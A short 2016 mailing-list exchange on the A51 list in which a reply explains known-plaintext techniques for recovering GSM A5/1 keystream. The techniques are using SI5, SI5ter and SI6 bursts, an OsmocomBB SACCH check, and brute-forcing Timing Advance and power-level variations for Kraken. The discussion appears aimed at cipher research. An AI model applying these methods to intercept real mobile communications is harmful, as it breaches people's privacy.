hi.. thank you for the explanation. seems I still need time to understand about it more. anyway it will help me for another start.. thanks :)
regards, Bass On Tue, Apr 12, 2016 at 8:29 AM, Вадим Яницкий <[email protected]> wrote: > 1) I think this guide will help you (a great Sylvain's explanations): > https://lists.srlabs.de/pipermail/a51/2010-July/000804.html > > Some networks broadcast SI packets in random sequence and also the > Ciphering Mode Command > is now always sent after constant count of frames. So, this method can be > useless for you. > > You can use a frame number to guess if this burst is related to SI5, > SI5ter of SI6. > Also if you are use OsmocomBB, try to use this condition: > if (burst->flags & BI_FLG_SACCH) { ... } > > SI5 is not the only message type you can use to find keystream. There are > also SI5ter, > SI6 and the "LAPDm U func=UI" packets. The last one is more difficult to > guess. > > 2) I've never used the gsmframecoder. All I know is that Timing Advance is > not > the only changing value. There is also MS Power Level, and it can be > changed > (sometimes often) during transmission too. Both of these parameters > negatively affect > the cracking success, i.e if at least one of them will be changed, the > Kraken will find > nothing or even give you some false positive results. > > I think there is a way to solve this problem. We can try to brute force > some range > of possible values for TA and MS Power Level. This way we should prepare a > couple > of modified SI packets (4 bursts each) using the one original. And then we > will be > able to XOR every supposed encrypted SI packet with each prepared > plaintext packet. > > С наилучшими пожеланиями, > Яницкий Вадим. > > _______________________________________________ > A51 mailing list > [email protected] > https://lists.srlabs.de/cgi-bin/mailman/listinfo/a51 > >
_______________________________________________ A51 mailing list [email protected] https://lists.srlabs.de/cgi-bin/mailman/listinfo/a51
